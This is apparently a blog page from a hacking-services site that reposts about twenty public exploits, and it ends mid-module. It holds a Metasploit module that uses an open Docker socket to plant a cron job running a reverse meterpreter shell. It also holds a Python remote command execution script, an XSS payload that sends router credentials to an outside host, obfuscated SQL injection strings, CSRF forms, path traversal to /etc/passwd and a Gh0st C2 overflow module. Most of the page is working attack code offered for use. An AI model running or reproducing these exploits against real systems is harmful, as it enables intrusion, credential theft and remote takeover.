Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863582573

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'             => 'Docker Daemon - Unprotected TCP Socket Exploit',
      'Description'      => %q{
        Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp
        with tls but without tls-auth), an attacker can create a Docker
        container with the '/' path mounted with read/write permissions on the
        host server that is running the Docker container. As the Docker
        container executes command as uid 0 it is honored by the host operating
        system allowing the attacker to edit/create files owned by root. This
        exploit abuses this to creates a cron job in the '/etc/cron.d/' path of
        the host server.

        The Docker image should exist on the target system or be a valid image
        from hub.docker.com.
      },
      'Author'           => 'Martin Pizala', # started with dcos_marathon module from Erik Daguerre
      'License'          => MSF_LICENSE,
      'References'       => [
        ['URL', 'https://docs.docker.com/engine/security/security/#docker-daemon-attack-surface'],
        ['URL', 'https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket']
      ],
      'DisclosureDate'   => 'Jul 25, 2017',
      'Targets'          => [
        [ 'Python', {
          'Platform'     => 'python',
          'Arch'         => ARCH_PYTHON,
          'Payload'      => {
            'Compat'     => {
              'ConnectionType' => 'reverse noconn none tunnel'
            }
          }
        }]
      ],
      'DefaultOptions'   => { 'WfsDelay' => 180, 'Payload' => 'python/meterpreter/reverse_tcp' },
      'DefaultTarget'    => 0))

    register_options(
      [
        Opt::RPORT(2375),
        OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
        OptString.new('CONTAINER_ID', [ false, 'container id you would like'])
      ]
    )
  end

  def check_image(image_id)
    vprint_status("Check if images exist on the target host")
    res = send_request_raw(
      'method'  => 'GET',
      'uri'     => normalize_uri('images', 'json')
    )
    return unless res and res.code == 200 and res.body.include? image_id

    res
  end

  def pull_image(image_id)
    print_status("Trying to pulling image from docker registry, this may take a while")
    res = send_request_raw(
      'method'  => 'POST',
      'uri'     => normalize_uri('images', 'create?fromImage=' + image_id)
    )
    return unless res.code == 200

    res
  end

  def make_container_id
    return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?

    rand_text_alpha_lower(8)
  end

  def make_cmd(mnt_path, cron_path, payload_path)
    vprint_status('Creating the docker container command')
    echo_cron_path = mnt_path + cron_path
    echo_payload_path = mnt_path + payload_path

    cron_command = "python #{payload_path}"
    payload_data = payload.raw

    command = "echo \"#{payload_data}\" >> #{echo_payload_path} && "
    command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} && "
    command << "echo \"\" >> #{echo_cron_path} && "
    command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}"

    command
  end

  def make_container(mnt_path, cron_path, payload_path)
    vprint_status('Setting container json request variables')
    {
      'Image'       => datastore['DOCKERIMAGE'],
      'Cmd'         => make_cmd(mnt_path, cron_path, payload_path),
      'Entrypoint'  => %w[/bin/sh -c],
      'HostConfig' => {
        'Binds'    => [
          '/:' + mnt_path
        ]
      }
    }
  end

  def del_container(container_id)
    send_request_raw(
      {
        'method'  => 'DELETE',
        'uri'     => normalize_uri('containers', container_id)
      },
      1 # timeout
    )
  end

  def check
    res = send_request_raw(
      'method'   => 'GET',
      'uri'      => normalize_uri('containers', 'json'),
      'headers'  => { 'Accept' => 'application/json' }
    )

    if res.nil?
      print_error('Failed to connect to the target')
      return Exploit::CheckCode::Unknown
    end

    if res and res.code == 200 and res.headers['Server'].include? 'Docker'
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    # check if target is vulnerable
    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Failure::Unknown, 'Failed to connect to the target')
    end

    # check if image is not available, pull it or fail out
    image_id = datastore['DOCKERIMAGE']
    if check_image(image_id).nil?
      fail_with(Failure::Unknown, 'Failed to pull the docker image') if pull_image(image_id).nil?
    end

    # create required information to create json container information.
    cron_path = '/etc/cron.d/' + rand_text_alpha(8)
    payload_path = '/tmp/' + rand_text_alpha(8)
    mnt_path = '/mnt/' + rand_text_alpha(8)
    container_id = make_container_id

    # create container
    res_create = send_request_raw(
      'method'  => 'POST',
      'uri'     => normalize_uri('containers', 'create?name=' + container_id),
      'headers' => { 'Content-Type' => 'application/json' },
      'data'    => make_container(mnt_path, cron_path, payload_path).to_json
    )
    fail_with(Failure::Unknown, 'Failed to create the docker container') unless res_create && res_create.code == 201

    print_status("The docker container is created, waiting for deploy")
    register_files_for_cleanup(cron_path, payload_path)

    # start container
    send_request_raw(
      {
        'method'  => 'POST',
        'uri'     => normalize_uri('containers', container_id, 'start')
      },
      1 # timeout
    )

    # wait until container stopped
    vprint_status("Waiting until the docker container stopped")
    res_wait = send_request_raw(
      'method'  => 'POST',
      'uri'     => normalize_uri('containers', container_id, 'wait'),
      'headers' => { 'Accept' => 'application/json' }
    )

    # delete container
    deleted_container = false
    if res_wait.code == 200
      vprint_status("The docker container has been stopped, now trying to remove it")
      del_container(container_id)
      deleted_container = true
    end

    # if container does not deploy, remove it and fail out
    unless deleted_container
      del_container(container_id)
      fail_with(Failure::Unknown, "The docker container failed to deploy")
    end
    print_status('Waiting for the cron job to run, can take up to 60 seconds')
  end
end
HireHackking 
Title:
====

FiberHome Unauthenticated ADSL Router Factory Reset.

Credit:
======

Name: Ibad Shah
Twitter: @BeeFaauBee09
Website: beefaaubee09.github.io


CVE:
=====

CVE-2017-14147

Date:
====

05-09-2017 (dd/mm/yyyy)

About FiberHome:
======

FiberHome Technologies is a leading equipment vendor and global solution provider the field of information technology and telecommunications. FiberHome Deals in fiber-optic communications, data networking communications, wireless communication, and intelligentizing applications. In particular, it has been providing end-to-end solutions integrated with opto-electronic devices, opticpreforms, fiber & cables, and optical communication systems to many countries around the world.

Products & Services:
Wireless 3G/4G broadband devices
Custom engineered technologies
Broadband devices

URL : http://www.fiberhomegroup.com/


Description:
=======

This vulnerability in AN1020-25 router enables an anonymous unauthorized attacker to bypass authentication & access Resetting Router to Factory Settings, resulting in un-authorized operation & resetting it to Factory state. It later allows attacker to login to Router's Main Page with default username & password. 



Affected Device Model:
=============

FiberHome ADSL AN1020-25


Exploitation-Technique:
===================

Remote


Details:
=======

Below listed vulnerability enables an anonymous unauthorized attacker to reset router to it's factory settings & further access router admin page with default credentials.

1) Bypass authentication and gain unauthorized access vulnerability - CVE-2017-14147

Vulnerable restoreinfo.cgi



Proof Of Concept:
================

PoC : 

GET /restoreinfo.cgi HTTP/1.1
Host: 192.168.1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close


HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Sat, 01 Jan 2000 00:12:39 GMT
Content-Type: text/html
Connection: close

<html>
<head>
<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
<link rel=stylesheet href='stylemain.css' type='text/css'>
<link rel=stylesheet href='colors.css' type='text/css'>
<script language="javascript">
<!-- hide

function restore() {
   var enblPopWin = '0';
   var loc = 'main.html';
   var code = 'window.top.location="' + loc + '"';

   if ( enblPopWin == '1' ) {
      loc = 'index.html';
      code = 'location="' + loc + '"';
   }

   eval(code);
}

function frmLoad() {
   setTimeout("restore()", 60000);
}

// done hiding -->
</script>
</head>

<body onLoad='frmLoad()'>
<blockquote>
<b>DSL Router Restore</b><br><br>
The DSL Router configuration has been restored to default settings and the
router is rebooting.<br><br>
Close the DSL Router Configuration window and wait for 2 minutes before
reopening your web browser. If necessary, reconfigure your PC's IP address to
match your new configuration.
</blockquote>
</body>
</html>



Credits:
=======

Ibad Shah, Taimooor Zafar, Owais Mehtab
HireHackking 
<!--
# # # # # 
# Exploit Title: Nimble Professional - Mobile Marketing Text Blast Web Application 1.0 - Cross-Site Request Forgery (Update Admin)
# Dork: N/A
# Date: 11.09.2017
# Vendor Homepage: http://ranksol.com/
# Software Link: http://www.mojomarketplace.com/item/nimble-pro
# Demo: http://demo.ranksol.com/demos/nimble-messaging-bulk-sms-marketing-application-for-business-pro-version/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# 
# Proof of Concept:
-->
<html>
<body>
<label>Edit Profile:</label>
<form method="post" class="form-horizontal" action="http://localhost/[PATH]/ajax.php">
<label>Admin Name:</label>
<input type="text" name="name" style="width: 400px;" value="Admin">
<label>Admin Email:</label>
<input type="text" name="email" style="width: 400px;" value="a@a.com">
<label>Admin Password:</label>
<input type="text" name="pass" style="width: 400px;" value="efe">
<button type="submit" class="btn  btn-success" >Save Profile</button>
<input type="hidden" name="cmd" value="save_profile">
</form>
</body>
</html>
HireHackking 
<!--
# # # # # 
# Exploit Title: jRank - Topsites Script 1.0 - Cross-Site Request Forgery
# Dork: N/A
# Date: 10.09.2017
# Vendor Homepage: https://topsitesscript.com/
# Software Link: https://topsitesscript.com/topsites-script-demo/
# Demo: http://www.topsitesscript.com/demo/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
-->
<form action="http://localhost/[PATH]/admin/headerfooter.php" method="post">
<input name="action" value="edit" type="hidden">
<table width="95%" cellspacing="1" cellpadding="3" border="0" align="center">
<tbody>
<tr bgcolor="#3498DB">
<td><b style="color:#FFFFFF;">Meta Tags File</b></td>
</tr>
<tr bgcolor="#FFFFFF">
<td>
<textarea cols="10" rows="2" name="meta" style="width: 100%">
<!-- 
Html Code etc.....
-->
</textarea>
</td>
</tr>
</tbody>
</table>
<table width="95%" cellspacing="1" cellpadding="3" border="0" align="center">
<tbody>
<tr bgcolor="#3498DB">
<td><b style="color:#FFFFFF;">Footer File</b></td>
</tr>
<tr bgcolor="#FFFFFF">
<td><textarea cols="60" rows="7" name="footer" style="width: 100%">
<!--
Php Code etc.....
-->
</textarea>
</td>
</tr>
<tr bgcolor="#FFFFFF">
<td>
<font face="verdana" size="2"><center><input name="submit" value="Edit" type="submit"></center></font>
</td>
</tr>
</tbody>
</table>
</form>
HireHackking 
# # # # # 
# Exploit Title: My Builder Marketplace Script 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/best-softwares/my-builder-marketplace
# Demo: http://mybuilderjobs.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept:
# 
# http://localhost/[PATH]/marketplace?start_date=[SQL]
# 
# Etc..
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Law Firm Website Script 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/small-business/law-firm-website
# Demo: http://lawwebsite.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept:
# 
# http://localhost/[PATH]/business-searchlist?country=[SQL]&state=[SQL]&city=[SQL]&farm_cat=[SQL]
# 
# Etc..
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Restaurant Website Script 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/small-business/restaurant-website-script
# Demo: http://restaurant.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept:
# 
# http://localhost/[PATH]/cms.php?id=[SQL]
# 
# -6'++/*!00002UNION*/+/*!00002SELECT*/+0x31,0x32,0x33,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,19,20,0x3231,0x3232--+-
# 
# http://localhost/[PATH]/contact.php?id=[SQL]
# 
# Etc..
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Professional Service Booking Software 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/best-softwares/professional-service-booking-engine
# Demo: http://professionalservice.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept:
# 
# http://localhost/[PATH]/content.php?page=[SQL]
# 
# -7+/*!50000UniOn*/+/*!50000SelECt*/+0x496873616e2053656e63616e,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))--+---+-
# 
# http://localhost/[PATH]/best_pro_details.php?service_id=[SQL]
# 
# -54'++/*!50000UNION*/(/*!50000SELECT*/+0x283129,0x283229,0x283329,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929)--+-
# 
# http://localhost/[PATH]/alllikes.php?service_id=[SQL]
# 
# Etc..
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Online Print Business Software 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/best-softwares/online-print-business
# Demo: http://onlineprintbssiness.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept:
# 
# http://localhost/[PATH]/product-decs.php?cat_id=[SQL]
# 
# -149++/*!50000UNION*/(/*!50000SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x28323729,0x28323829,0x28323929)--+-
# 
# http://localhost/[PATH]/info.php?page=[SQL]
# 
# Etc..
# # # # #
HireHackking 
#####
# Exploit Title: RPi Cam Control <= v6.3.14 (RCE) Multiple Vulnerabilities - preview.php
# Date: 16/08/2017
# Exploit Author: Alexander Korznikov
# Vendor Homepage: https://github.com/silvanmelchior/RPi_Cam_Web_Interface
# Software Link: https://github.com/silvanmelchior/RPi_Cam_Web_Interface
# Version: <= v6.3.14
# Date 16/08/2017
#
# A web interface for the RPi Cam
# Vendor github: https://github.com/silvanmelchior/RPi_Cam_Web_Interface
#
# Bug Discovered by Alexander Korznikov:
#     www.exploit-db.com/author/?a=8722
#     www.linkedin.com/in/nopernik
#     www.korznikov.com
#
# RPi Cam Control <= v6.3.14 is vulnerable to Local File Read and Blind Command Injection.
#
#
# Local File Read (get /etc/passwd file):
# ----------------
# POST /preview.php HTTP/1.1
# Host: 127.0.0.1
# Content-Type: application/x-www-form-urlencoded
# Connection: close
# Content-Length: 80
#
# download1=../../../../../../../../../../../../../../../../etc/passwd.v0000.t
#
#
# Blind Command Injection:
# ------------------
# POST /preview.php HTTP/1.1
# Host: 127.0.0.1
# Content-Type: application/x-www-form-urlencoded
# Connection: close
# Content-Length: 52
#
# convert=none&convertCmd=$(COMMAND_TO_EXECUTE)
#
#
# Blind Command Injection can be used with Local File Read to properly get the output of injected command.
#
# Proof of Concept Code:
#####

#!/usr/bin/python

import requests
import sys
if not len(sys.argv[2:]):
   print "Usage: RPi-Cam-Control-RCE.py 127.0.0.1 'cat /etc/passwd'"
   exit(1)

def GET(target, rfile):
   res = requests.post("http://%s/preview.php" % target,
        headers={"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"},
        data={"download1": "../../../../../../../../../../../../../../../../{}.v0000.t".format(rfile)})
   return res.content

def RCE(target, command):
   requests.post("http://%s/preview.php" % target,
        headers={"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"},
        data={"convert": "none", "convertCmd": "$(%s > /tmp/output.txt)" % command})
   return GET(target,'/tmp/output.txt')

target = sys.argv[1]
command = sys.argv[2]

print RCE(target,command)
HireHackking 
# # # # # 
# Exploit Title: Just Dial Marketplace Software 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/best-softwares/just-dial-marketplace
# Demo: http://classified.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept:
# 
# http://localhost/[PATH]/result/[SQL]/eFe
# http://localhost/[PATH]/business/[SQL]/eFe
# 
# Etc..
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Job Board Software 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/best-softwares/job-board-software
# Demo: http://jobsite.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept:
# 
# http://localhost/[PATH]/job-details/[SQL]/eFe
# 
# -131'+/*!50000UNION*/(/*!50000SELECT*/+0x283129,0x283229,0x283329,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229)--+-/eFe
# 
# Etc..
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Babysitter Website Script 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/best-softwares/babysitter-website
# Demo: http://babysitter.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept:
# 
# http://localhost/[PATH]/taskers?skills=[SQL]
# 
# 63'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+1=1='
# 
# Etc..
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Escort Website Script 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/escort-website
# Demo: http://escortwebsite.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept:
# 
# http://localhost/[PATH]/prof_detils.html?escort=[SQL]
# 
# -1418820035'+/*!11112UnIoN*/+(/*!11112SelEcT*/0x283129,0x283229,0x283329,0x283429,(Select+export_set(5,@:=0,(/*!11112SelEcT*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629)--+-
# 
# http://localhost/[PATH]/ajax_rating.php?escort=[SQL]
# 
# Etc..
# # # # #
HireHackking 
# Exploit Title: XSS persistent on intelbras router with firmware WRN 250
# Date: 07/09/2017
# Exploit Author: Elber Tavares
# Vendor Homepage: http://intelbras.com.br/
# Version: Intelbras Wireless N 150Mbps - WRN 240
# Tested on: kali linux, windows 7, 8.1, 10

# CVE-2017-14219

For more info:


http://whiteboyz.xyz/xss-roteador-intelbras-wrn-240html

URL VULN: http://10.0.0.1/userRpm/popupSiteSurveyRpm.htm

Payload: </script><script src='//elb.me'>

"elb.me contains the malicious code on index"

airbase-ng -e "</script><script src='//elb.me'>" -c 8 -v wlan0mon

//requires an php script to get the logs

PoC:

var rawFile = new XMLHttpRequest();
rawFile.onreadystatechange = function() {
       alert(rawFile.responseText);
       var base64 = rawFile.responseText.split('>')[1].split("/SCRIPT")[0];
       //seleiciona a parte da página com as credenciais
       new Image().src="https://elb.me/cookie.php?ck="+btoa(base64);
       //envia as credenciais encodadas em base64
};
rawFile.open("GET", "http://10.0.0.1/userRpm/WlanSecurityRpm.htm", true);
//pega a source da página /popupSiteSurveyRpm.htm
rawFile.send();
HireHackking 
# Exploit Title: [Server Directory Traversal at Huawei HG255s]

# Date: [07.09.2017]

# Exploit Author: [Ahmet Mersin]

# Vendor Homepage: [www.huawei.com]

# Software Link: [Not published this modem just used by Turkey]

# Version: [V100R001C163B025SP02]

#POC:

https://www.youtube.com/watch?v=n02toTFkLOU&feature=youtu.be

http://192.168.1.1/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

#You want to follow my activity ?

https://www.linkedin.com/in/ahmet-mersin-177398b0/

@gaissecurity
HireHackking 
# # # # # 
# Exploit Title: EzInvoice - Invoice Management System 6.0.2 - SQL Injection
# Dork: N/A
# Date: 07.09.2017
# Vendor Homepage: http://www.mysticdreams.net/
# Software Link: http://www.mysticdreams.net/resources/ezinvoice_demo.zip
# Demo: http://www.mysticdreams.net/products/ezinvoice/
# Version: 6.0.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# Sql
# http://localhost/[PATH]/editclient.php?id=[SQL]
# -100+/*!11122UniOn*/+/*!11122SeleCt*/+0x283129,/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),0x283329,/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION())--+-
# 
# Bypass
# http://localhost/[PATH]/index.php
# User: 'or 1=1 or ''=' Pass: anything
# 
# Backup
# http://localhost/[PATH]/backups/index.php?client_name=admin
# 
# Etc...
# # # # #
HireHackking 
# # # # # 
# Exploit Title: EzBan - Banner Management System 5.3 - SQL Injection
# Dork: N/A
# Date: 07.09.2017
# Vendor Homepage: http://www.mysticdreams.net/
# Software Link: http://www.mysticdreams.net/resources/ezban_demo.zip
# Demo: http://www.mysticdreams.net/products/ezban/
# Version: 5.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# Sql
# http://localhost/[PATH]/ezban.php?id=[SQL]&action=show
# 100++aND(/*!00002SelEcT*/+0x30783331+/*!00002frOM*/+(/*!00002SelEcT*/+cOUNT(*),/*!00002cOnCaT*/((/*!00002sELECT*/(/*!00002sELECT*/+/*!00002cOnCaT*/(cAST(dATABASE()+aS+/*!00002cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00002wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00002rAND*/(0)*2))x+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00002aNd*/+1=1&action=show
# 
# Etc...
# # # # #
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'zlib'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Gh0st Client buffer Overflow',
      'Description'    => %q{
          This module exploits a Memory buffer overflow in the Gh0st client (C2 server)
      },
      'Author'         => 'Professor Plum',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'AllowWin32SEH' => true
        },
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => '',
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed
        },
      'Platform'       => 'win',
      'DisclosureDate' => 'Jul 27 2017',
      'Targets'        =>
        [
          ['Gh0st Beta 3.6', { 'Ret' => 0x06001010 }]
        ],
      'Privileged'     => false,
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('MAGIC', [true, 'The 5 char magic used by the server', 'Gh0st']),
        Opt::RPORT(80)
      ]
    )
  end

  def make_packet(id, data)
    msg = id.chr + data
    compressed = Zlib::Deflate.deflate(msg)
    datastore['MAGIC'] + [13 + compressed.size].pack('V') + [msg.size].pack('V') + compressed
  end

  def validate_response(data)
    if data.nil?
      print_status('Server closed connection')
      return false
    end
    if data.empty?
      print_status('No response recieved')
      return false
    end
    if data.size < 13
      print_status('Invalid packet')
      print_status(data)
      return false
    end
    mag, pktlen, msglen = data[0..13].unpack('a' + datastore['MAGIC'].size.to_s + 'VV')
    if mag.index(datastore['MAGIC']) != 0
      print_status('Bad magic: ' + mag[0..datastore['MAGIC'].size])
      return false
    end
    if pktlen != data.size
      print_status('Packet size mismatch')
      return false
    end
    msg = Zlib::Inflate.inflate(data[13..data.size])
    if msg.size != msglen
      print_status('Packet decompress failure')
      return false
    end
    return true
  end

  def check
    connect
    sock.put(make_packet(101, "\x00")) # heartbeat
    if validate_response(sock.get_once || '')
      return Exploit::CheckCode::Appears
    end
    Exploit::CheckCode::Safe
  end

  def exploit
    print_status("Trying target #{target.name}")
    print_status('Spraying heap...')
    for i in 0..100
      connect
      sock.put(make_packet(101, "\x90" * 3 + "\x90\x83\xc0\x05" * 1024 * 1024 + payload.encoded))
      if not validate_response(sock.get_once)
        disconnect
        return
      end
    end

    for i in 103..107
      print_status("Trying command #{i}...")
      begin
        connect
